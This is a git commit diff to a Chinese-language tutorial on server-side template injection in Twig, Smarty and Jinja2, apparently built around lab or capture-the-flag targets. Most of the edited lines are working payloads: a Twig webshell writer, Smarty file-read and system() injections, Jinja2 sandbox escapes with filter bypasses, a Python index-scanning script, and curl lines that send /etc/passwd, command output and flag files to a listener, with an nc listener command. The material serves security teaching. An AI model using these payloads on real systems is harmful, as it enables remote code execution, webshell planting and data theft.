10-12-周日_09-45-51
This commit is contained in:
@@ -162,7 +162,7 @@ echo $twig->render('tags.twig',[
|
||||
|
||||
|
||||
|
||||
有两种形式的分隔符:{{% ... %} 和 {{ ... }}。前者用于执行语句,例如 for 循环,后者用于将表达式的结果输出到模板中。
|
||||
有两种形式的分隔符:{% ... %} 和 {{ ... }}。前者用于执行语句,例如 for 循环,后者用于将表达式的结果输出到模板中。
|
||||
|
||||
需要注意的是twig会生产缓存文件,所以导致有时候模版的变化并不能直接看到效果,可以每次都让php先清理缓存,再渲染模版
|
||||
|
||||
@@ -515,6 +515,12 @@ public function registerUndefinedFilterCallback($callable)
|
||||
|
||||
#### 4.3.11 Twig 2.x / 3.x
|
||||
|
||||
需要切换版本
|
||||
|
||||
```
|
||||
composer require "twig/twig:^3.0"
|
||||
```
|
||||
|
||||
测试代码如下:
|
||||
|
||||
```php
|
||||
@@ -613,7 +619,7 @@ twig_array_map([0 => "id"], "system")
|
||||
如果上面这些命令执行函数都被禁用了,我们还可以执行其他函数执行任意代码:
|
||||
|
||||
```plain
|
||||
{{{"<?php phpinfo();eval($_POST[whoami])":"/app/public/hell.php"}|map("file_put_contents")}} // 写 Webshell
|
||||
{{{"<?php phpinfo();eval($_POST[whoami])":"/app/public/shell.php"}|map("file_put_contents")}} // 写 Webshell
|
||||
```
|
||||
|
||||
|
||||
@@ -810,7 +816,7 @@ composer require smarty/smarty:^3
|
||||
require 'vendor/autoload.php';
|
||||
$smarty = new Smarty();
|
||||
$smarty->setTemplateDir('templates');
|
||||
$smarty->assign('name', 'eagleslab');
|
||||
$smarty->assign('name', '张三');
|
||||
$smarty->display('index.tpl');
|
||||
```
|
||||
|
||||
@@ -820,7 +826,7 @@ $smarty->display('index.tpl');
|
||||
<h1>Hello {$name} !</h1>
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### 4.5.2 开始复现
|
||||
|
||||
@@ -837,6 +843,8 @@ $smarty->display($data);
|
||||
// 模版文件直接由用户端传入
|
||||
```
|
||||
|
||||
|
||||
|
||||
任意文件读取
|
||||
|
||||
- POC:`string:{{include file='C:/Windows/win.ini'}`
|
||||
@@ -918,7 +926,7 @@ string:{function name='x(){};system(whoami);function '}{/function}
|
||||
|
||||
#### 4.5.4 CVE-2021-26119
|
||||
|
||||
我们将版本切换到最新版
|
||||
我们将版本切换到3.1.46版本
|
||||
|
||||
```bash
|
||||
docker exec -it lnmp74 bash
|
||||
@@ -941,7 +949,7 @@ string:{$smarty.template_object->smarty->setCacheDir('./x')->display('string:{sy
|
||||
```
|
||||
|
||||
- 漏洞原因:可以通过`{{$smarty.template_object}`访问到 smarty 对象所导致
|
||||
- 版本限制:这个漏洞还没有被修复,我试过最新版本 4.1.0 跟 3.1.44 都能注入恶意代码
|
||||
- 版本限制:这个漏洞能够生效的最新版本 4.1.0 跟 3.1.44 都能注入恶意代码
|
||||
|
||||
测试效果
|
||||
|
||||
@@ -1011,7 +1019,7 @@ if __name__ == '__main__':
|
||||
└─# python app.py
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
测试代码
|
||||
|
||||
@@ -1037,11 +1045,11 @@ if __name__ == '__main__':
|
||||
|
||||
以flask的jinja2引擎为例,官方的模板语法如下:
|
||||
|
||||
- {{% ... %} 用于声明,比如在使用for控制语句或者if语句时
|
||||
- {% ... %} 用于声明,比如在使用for控制语句或者if语句时
|
||||
- {{......}} 用于打印到模板输出的表达式,比如之前传到到的变量(更准确的叫模板上下文),例如上文 '3*5' 这个表达式
|
||||
- {{# ... #} 用于模板注释
|
||||
- {# ... #} 用于模板注释
|
||||
- \# ... ## 用于行语句,就是对语法的简化
|
||||
- \#...#可以有和{{%%}相同的效果
|
||||
- \#...#可以有和{%%}相同的效果
|
||||
|
||||
由于参数完全可控,则攻击者就可以通过精心构造恶意的 Payload 来让服务器执行任意代码,造成严重危害。下面通过 SSTI 命令执行成功执行 whoami 命令:
|
||||
|
||||
@@ -1166,13 +1174,13 @@ select() 通过对每个对象应用测试并仅选择测试成功的对象来
|
||||
|
||||
##### 5.1.3.1 读取文件
|
||||
|
||||
python2的使用`<type 'file'>`这个类型
|
||||
python2的使用`<type 'file'>`这个类型
|
||||
|
||||
```plain
|
||||
{{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}
|
||||
```
|
||||
|
||||
python3中调用`<class '_frozen_importlib_external.FileLoader'>`这个类去读取文件
|
||||
python3中调用`<class '_frozen_importlib_external.FileLoader'>`这个类去读取文件
|
||||
|
||||
```plain
|
||||
{{().__class__.__bases__[0].__subclasses__()[79]["get_data"](0, "/etc/passwd")}}
|
||||
@@ -1190,8 +1198,7 @@ python3中调用`<class '_frozen_importlib_external.FileLoader'>`这个类去
|
||||
|
||||
注意!需要关闭flask的debug模式,因为报错界面里面包含eval,会导致每个页面都符合。
|
||||
|
||||
```
|
||||
app.run(host="0.0.0.0",port=5000,debug=False)
|
||||
```python
|
||||
import requests
|
||||
|
||||
headers = {
|
||||
@@ -1199,7 +1206,6 @@ headers = {
|
||||
}
|
||||
for i in range(500):
|
||||
url = "http://192.168.173.66:5000/ssti?name={{().__class__.__bases__[0].__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}"
|
||||
print(url)
|
||||
res = requests.get(url=url, headers=headers)
|
||||
if 'eval' in res.text:
|
||||
print(i)
|
||||
@@ -1451,15 +1457,15 @@ subprocess 意在替代其他几个老的模块或者函数,比如:os.system
|
||||
```plain
|
||||
{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f']['\u0065\u0076\u0061\u006c']('__import__("os").popen("ls /").read()')}}
|
||||
|
||||
{{().__class__.__base__.__subclasses__()[77].__init__.__globals__['\u006f\u0073'].popen('\u006c\u0073\u0020\u002f').read()}}
|
||||
{{().__class__.__base__.__subclasses__()[400].__init__.__globals__['\u006f\u0073'].popen('\u006c\u0073\u0020\u002f').read()}}
|
||||
```
|
||||
|
||||
等同于:
|
||||
|
||||
```plain
|
||||
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}
|
||||
{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}
|
||||
|
||||
{{().__class__.__base__.__subclasses__()[77].__init__.__globals__['os'].popen('ls /').read()}}
|
||||
{{().__class__.__base__.__subclasses__()[400].__init__.__globals__['os'].popen('ls /').read()}}
|
||||
```
|
||||
|
||||
#### 5.2.4 利用Hex编码绕过关键字
|
||||
@@ -1583,7 +1589,7 @@ pop()方法可以返回指定序列属性中的某个索引处的元素或指定
|
||||
示例:
|
||||
|
||||
```plain
|
||||
{{''.__class__.__mro__.__getitem__(1).__subclasses__().pop(79).__dict__.get_data(0,request.args.path)}}&path=/etc/passwd
|
||||
{{().__class__.__mro__.__getitem__(1).__subclasses__().pop(79).__dict__.get_data(0,request.args.path)}}&path=/etc/passwd
|
||||
|
||||
{{().__class__.__base__.__subclasses__()[400].__init__.__globals__[request.args.os].popen(request.args.cmd).read()}}&os=os&cmd=ls /
|
||||
```
|
||||
@@ -1656,21 +1662,27 @@ pop()方法可以返回指定序列属性中的某个索引处的元素或指定
|
||||
|
||||
##### 5.2.7.5 过滤了大括号 {{
|
||||
|
||||
我们可以用Jinja2的 {{%...%} 语句装载一个循环控制语句来绕过:
|
||||
我们可以用Jinja2的 {%...%} 语句装载一个循环控制语句来绕过:
|
||||
|
||||
```plain
|
||||
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
|
||||
{% for c in [].__class__.__base__.__subclasses__() %}
|
||||
{% if c.__name__=='catch_warnings' %}
|
||||
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
```
|
||||
|
||||
也可以使用 {{% if ... %}1{{% endif %} 配合 os.popen 和 curl 将执行结果外带(不外带的话无回显)出来:
|
||||
也可以使用 {% if ... %}1{% endif %} 配合 os.popen 和 curl 将执行结果外带(不外带的话无回显)出来:
|
||||
|
||||
```plain
|
||||
{% if ''.__class__.__base__.__subclasses__()[191].__init__.__globals__.linecache.os.popen('curl http://10.3.66.102:2333/?key=`cat /etc/passwd`')%}1{% endif %}
|
||||
{% if ''.__class__.__base__.__subclasses__()[191].__init__.__globals__.linecache.os.popen('curl http://10.3.66.102:2333/?key=`cat /etc/passwd`')%}
|
||||
1
|
||||
{% endif %}
|
||||
|
||||
# 开启 nc 监听 nc -lvp 2333
|
||||
```
|
||||
|
||||
也可以用 {{%print(......)%} 的形式来代替 {{ ,如下:
|
||||
也可以用 {%print(......)%} 的形式来代替 {{ ,如下:
|
||||
|
||||
```plain
|
||||
{%print(''.__class__.__base__.__subclasses__()[400].__init__.__globals__['os'].popen('curl http://10.3.66.102:2333/?key=`whoami`').read())%}
|
||||
@@ -1722,13 +1734,13 @@ __ . [ "
|
||||
{{().__class__.__base__.__subclasses__()[400].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}
|
||||
```
|
||||
|
||||
由于中括号 [ 被过滤了,我们可以用 __getitem__() 来绕过(尽量不要用pop()),类似如下:
|
||||
由于中括号 [ 被过滤了,我们可以用 `__getitem__()` 来绕过(尽量不要用pop()),类似如下:
|
||||
|
||||
```plain
|
||||
{{().__class__.__base__.__subclasses__().__getitem__(400).__init__.__globals__.__getitem__('__builtins__').__getitem__('eval')('__import__("os").popen("ls /").read()')}}
|
||||
```
|
||||
|
||||
由于还过滤了下划线 __,我们可以用request对象绕过,但是还过滤了中括号 [],所以我们要同时绕过 __ 和 [,就用到了我们的|attr()
|
||||
由于还过滤了下划线` __`,我们可以用request对象绕过,但是还过滤了中括号 [],所以我们要同时绕过 __ 和 [,就用到了我们的|attr()
|
||||
|
||||
所以最终的payload如下:
|
||||
|
||||
@@ -1901,7 +1913,7 @@ if __name__ == "__main__":
|
||||
|
||||
|
||||
|
||||
可以看到,我们得到了一段字符串:`<generator object select_or_reject at 0x7f3684f2f3e0>`,这段字符串中不仅存在字符,还存在空格、下划线,尖号和数字。也就是说,如果题目过滤了这些字符的话,我们便可以在 `<generator object select_or_reject at 0x7f3684f2f3e0>` 这个字符串中取到我们想要的字符,从而绕过过滤。
|
||||
可以看到,我们得到了一段字符串:`<generator object select_or_reject at 0x7f3684f2f3e0>`,这段字符串中不仅存在字符,还存在空格、下划线,尖号和数字。也就是说,如果题目过滤了这些字符的话,我们便可以在 `<generator object select_or_reject at 0x7f3684f2f3e0>` 这个字符串中取到我们想要的字符,从而绕过过滤。
|
||||
|
||||
然后我们在使用list()过滤器将字符串转化为列表:
|
||||
|
||||
@@ -1977,7 +1989,7 @@ if __name__ == "__main__":
|
||||
{% set bul = xhx*2~but~xhx*2 %} # __builtins__
|
||||
```
|
||||
|
||||
将上面构造的字符或字符串拼接起来构造出 __import__('os').popen('cat /flag').read():
|
||||
将上面构造的字符或字符串拼接起来构造出` __import__('os').popen('cat /flag').read()`:
|
||||
|
||||
```plain
|
||||
{% set pld = xhx*2~imp~xhx*2~left~yin~os~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}
|
||||
@@ -1985,7 +1997,7 @@ if __name__ == "__main__":
|
||||
|
||||
|
||||
|
||||
如上图所示,成功构造出了 __import__('os').popen('cat /flag').read() 。
|
||||
如上图所示,成功构造出了 `__import__('os').popen('cat /flag').read() `。
|
||||
|
||||
然后将上面构造的各种变量添加到SSTI万能payload里面就行了:
|
||||
|
||||
@@ -2081,7 +2093,7 @@ Payload构造过程如下:
|
||||
最后的payload如下
|
||||
|
||||
```plain
|
||||
{% set zero = (self|int) %}{% set one = (zero**zero)|int %}{% set two = (zero-one-one)|abs %}{% set four = (two*two)|int %}{% set five = (two*two*two)-one-one-one %}{% set three = five-one-one %}{% set nine = (two*two*two*two-five-one-one) %}{% set seven = (zero-one-one-five)|abs %}{% set space = self|string|min %}{% set point = self|float|string|min %}{% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc = bfh~c %}{% set slas = bfhc%((four~seven)|int) %}{% set yin = bfhc%((three~nine)|int) %}{% set xhx = bfhc%((nine~five)|int) %}{% set right = bfhc%((four~one)|int) %}{% set left = bfhc%((four~zero)|int) %}{% set but = dict(buil=aa,tins=dd)|join %}{% set imp = dict(imp=aa,ort=dd)|join %}{% set pon = dict(po=aa,pen=dd)|join %}{% set so = dict(o=aa,s=dd)|join %}{% set ca = dict(ca=aa,t=dd)|join %}{% set flg = dict(fl=aa,ag=dd)|join %}{% set ev = dict(ev=aa,al=dd)|join %}{% set red = dict(re=aa,ad=dd)|join %}{% set bul = xhx~xhx~but~xhx~xhx %}{% set ini = dict(ini=aa,t=bb)|join %}{% set glo = dict(glo=aa,bals=bb)|join %}{% set itm = dict(ite=aa,ms=bb)|join %}{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}{% for f,v in (self|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}{% if f == bul %}{% for a,b in (v|attr(itm))() %}{% if a == ev %}{{b(pld)}}{% endif %}{% endfor %}{% endif %}{% endfor %}
|
||||
{% set zero = (self|int) %}{% set one = (zero**zero)|int %}{% set two = (zero-one-one)|abs %}{% set four = (two*two)|int %}{% set five = (two*two*two)-one-one-one %}{% set three = five-one-one %}{% set nine = (two*two*two*two-five-one-one) %}{% set seven = (zero-one-one-five)|abs %}{% set space = self|string|min %}{% set point = self|float|string|min %}{% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc = bfh~c %}{% set slas = bfhc%((four~seven)|int) %}{% set yin = bfhc%((three~nine)|int) %}{% set xhx = bfhc%((nine~five)|int) %}{% set right = bfhc%((four~one)|int) %}{% set left = bfhc%((four~zero)|int) %}{% set but = dict(buil=aa,tins=dd)|join %}{% set imp = dict(imp=aa,ort=dd)|join %}{% set pon = dict(po=aa,pen=dd)|join %}{% set so = dict(o=aa,s=dd)|join %}{% set ca = dict(ca=aa,t=dd)|join %}{% set flg = dict(fl=aa,ag=dd)|join %}{% set ev = dict(ev=aa,al=dd)|join %}{% set red = dict(re=aa,ad=dd)|join %}{% set bul = xhx~xhx~but~xhx~xhx %}{% set ini = dict(ini=aa,t=bb)|join %}{% set glo = dict(glo=aa,bals=bb)|join %}{% set itm = dict(ite=aa,ms=bb)|join %}{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}{% for f,v in (whoami|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}{% if f == bul %}{% for a,b in (v|attr(itm))() %}{% if a == ev %}{{b(pld)}}{% endif %}{% endfor %}{% endif %}{% endfor %}
|
||||
```
|
||||
|
||||
|
||||
@@ -2130,7 +2142,7 @@ import
|
||||
|
||||
|
||||
|
||||
访问到了类,我们就可以通过 __bases__ 来获取基类的元组,带上索引0就可以访问到相应的基类。由此一直向上我们就可以访问到最顶层的object基类了。(同样的,如果没有过滤config的话,我们还可以利用config来逃逸,方法与session的相同)
|
||||
访问到了类,我们就可以通过 `__bases__` 来获取基类的元组,带上索引0就可以访问到相应的基类。由此一直向上我们就可以访问到最顶层的object基类了。(同样的,如果没有过滤config的话,我们还可以利用config来逃逸,方法与session的相同)
|
||||
|
||||
|
||||
|
||||
@@ -2149,15 +2161,15 @@ SSTI目的无非就是两个:文件读写、执行命令。因此我们核心
|
||||
|
||||
|
||||
```plain
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[343]}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[128]}}
|
||||
```
|
||||
|
||||
|
||||
|
||||
我们调用它的 __init__ 函数将其实例化,然后用 __globals__ 查看其全局变量。
|
||||
我们调用它的 `__init__` 函数将其实例化,然后用` __globals__ `查看其全局变量。
|
||||
|
||||
```plain
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[343].__init__.__globals__}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[128].__init__.__globals__}}
|
||||
```
|
||||
|
||||
|
||||
@@ -2165,13 +2177,13 @@ SSTI目的无非就是两个:文件读写、执行命令。因此我们核心
|
||||
确认存在“popen”
|
||||
|
||||
```plain
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[343].__init__.__globals__['po'+'pen']('ls /').read()}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[128].__init__.__globals__['po'+'pen']('ls /').read()}}
|
||||
```
|
||||
|
||||
|
||||
|
||||
```plain
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[343].__init__.__globals__['po'+'pen']('cat /Th1s__is_S3cret').read()}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[128].__init__.__globals__['po'+'pen']('cat /Th1s__is_S3cret').read()}}
|
||||
```
|
||||
|
||||
成功拿到flag
|
||||
@@ -2217,13 +2229,13 @@ os
|
||||
这里我们注意到了__enter__方法,查看其内容,发现其竟然有 __globals__ 方法可用,也就是说这个__enter__方法与 __init__ 方法一模一样。
|
||||
|
||||
```plain
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[160].__enter__.__globals__['po'+'pen']('ls /').read()}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[30].__enter__.__globals__['po'+'pen']('ls /').read()}}
|
||||
```
|
||||
|
||||
|
||||
|
||||
```plain
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[160].__enter__.__globals__['po'+'pen']('cat /Th1s_is__F1114g').read()}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[30].__enter__.__globals__['po'+'pen']('cat /Th1s_is__F1114g').read()}}
|
||||
```
|
||||
|
||||
|
||||
@@ -2242,7 +2254,7 @@ nc -lvp 2333
|
||||
|
||||
```plain
|
||||
http://192.168.173.66:5000/haha/
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[160].__enter__.__globals__['po'+'pen']('curl http://192.168.173.1:2333 -d `ls /`').read()}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[30].__enter__.__globals__['po'+'pen']('curl http://192.168.173.1:2333 -d `ls /`').read()}}
|
||||
```
|
||||
|
||||
|
||||
@@ -2251,7 +2263,7 @@ http://192.168.173.66:5000/haha/
|
||||
|
||||
```plain
|
||||
http://192.168.173.66:5000/haha/
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[160].__enter__.__globals__['po'+'pen']('curl http://192.168.173.1:2333 -d `cat /Th1s_is__F1114g`').read()}}
|
||||
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[30].__enter__.__globals__['po'+'pen']('curl http://192.168.173.1:2333 -d `cat /Th1s_is__F1114g`').read()}}
|
||||
```
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user